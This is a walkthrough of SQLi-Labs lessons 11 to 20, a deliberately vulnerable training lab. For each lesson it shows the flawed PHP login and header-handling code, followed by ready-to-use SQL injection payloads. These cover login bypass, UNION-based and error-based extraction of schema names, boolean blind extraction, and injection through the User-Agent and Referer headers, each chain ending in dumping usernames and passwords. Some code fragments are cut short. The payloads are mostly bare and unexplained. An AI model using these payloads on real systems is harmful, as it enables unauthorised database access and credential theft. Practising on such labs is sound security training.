SQLi-Labs Less 11-20
Less-11 POST - Error based - Single Quotes - String
Code:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
if($row)
{
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}
else
{
//echo "Try again looser";
print_r(mysql_error());
Code:
' or 1=1 --
' or 1=2 union select user(),database() --
' or 1=2 union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --
' or 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --
' or 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --
' or 1=2 union select username,password from security.users LIMIT 0,1 --
Less-12 POST - Error based - Double Quotes - String - with twist
Code:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
if($row)
{
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}
else
{
//echo "Try again looser";
print_r(mysql_error());
Code:
") or 1=1 --
") or 1=2 union select user(),database() --
") or 1=2 union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --
") or 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --
") or 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --
") or 1=2 union select username,password from security.users LIMIT 0,1 --
Less-13 POST - Double injection - Single Quotes - String - with twist
Code:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
if($row)
{
//echo " You Have successfully logged in " ;
//echo 'Your Login name:'. $row['username'];
//echo 'Your Password:' .$row['password'];
}
else
{
//echo "Try again looser";
print_r(mysql_error());
Code:
') or 1=1 --
') union select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b --
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b --
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b --
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b --
') union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b --
Less-14 POST - Double injection - Single Quotes - String - with twist
Code:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
if($row)
{
//echo " You Have successfully logged in " ;
//echo 'Your Login name:'. $row['username'];
//echo 'Your Password:' .$row['password'];
}
else
{
//echo "Try again looser";
print_r(mysql_error());
Code:
" or 1=1 --
" union select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b --
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b --
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b --
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b --
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b --
Less-15 POST - Blind - Boolean/time Based - Single Quotes
Code:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
if($row)
{
//echo " You Have successfully logged in " ;
//echo 'Your Login name:'. $row['username'];
//echo 'Your Password:' .$row['password'];
}
else
{
//echo "Try again looser";
//print_r(mysql_error());
Code:
' or 1=1 --
' or ascii(substr(database(),1,1))=115 --
' or (ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 --
' or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 --
' or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 --
' or (ascii(substr((select username from users limit 0,1),1,1))) = 68 --
' or (ascii(substr((select password from users limit 0,1),1,1))) = 68 --
Less-16 POST - Blind - Boolean/time Based - Double Quotes
Code:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
if($row)
{
//echo " You Have successfully logged in " ;
//echo 'Your Login name:'. $row['username'];
//echo 'Your Password:' .$row['password'];
}
else
{
//echo "Try again looser";
//print_r(mysql_error());
Code:
") or 1=1 --
") or ascii(substr(database(),1,1))=115 --
") or (ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 --
") or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 --
") or (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 --
") or (ascii(substr((select username from users limit 0,1),1,1))) = 68 --
") or (ascii(substr((select password from users limit 0,1),1,1))) = 68 --
Less-17 POST - Update Query - Error Based - String
Code:
';
$row1 = $row['username'];
//echo 'Your Login name:'. $row1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
echo "
";
if (mysql_error())
{
echo '';
print_r(mysql_error());
echo "";
echo "";
}
else
{
echo '';
//echo " You password has been successfully updated " ;
echo "
";
echo "";
}
echo '';
//echo 'Your Password:' .$row['password'];
echo "";
}
else
{
echo '';
//echo "Bug off you Silly Dumb hacker";
echo "";
echo '';
echo "";
}
}
?>
Code:
UPDATE users SET password = '$passwd' WHERE username='$row1'
' and (select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b) --+
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b) --+
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b) --+
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b) --+
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b) --+
Less-18 POST - Header Injection - Uagent field - Error based
Code:
';
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "";
//echo "
";
echo '';
echo 'Your User Agent is: ' .$uagent;
echo "";
echo "
";
print_r(mysql_error());
echo "
";
echo '';
echo "
";
}
else
{
echo '';
//echo "Try again looser";
print_r(mysql_error());
echo "";
echo "";
echo '';
echo "";
}
}
?>
Code:
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)
' and (select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b),'192.168.1.11', 'Dumb') #
Less-19 POST - Header Injection - Referer field - Error based
Code:
';
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "";
//echo "
";
echo '';
echo 'Your Referer is: ' .$uagent;
echo "";
echo "
";
print_r(mysql_error());
echo "
";
echo '';
echo "
";
}
else
{
echo '';
//echo "Try again looser";
print_r(mysql_error());
echo "";
echo "";
echo '';
echo "";
}
}
?>
Code:
INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')
' and (select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b),'192.168.1.11') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b),'192.168.1.11') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b),'192.168.1.11') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b),'192.168.1.11') #
' and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b),'192.168.1.11') #
Less-20 POST - Cookie Injection - Uagent field - Error based
Code:
Welcome Dhakkan
Code:
' or 1=1 --
' and ascii(substr(database(),1,1))=115 --
' and (ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 --
' and (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 --
' and (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 --
' and (ascii(substr((select username from users limit 0,1),1,1))) = 68 --
' and (ascii(substr((select password from users limit 0,1),1,1))) = 68 --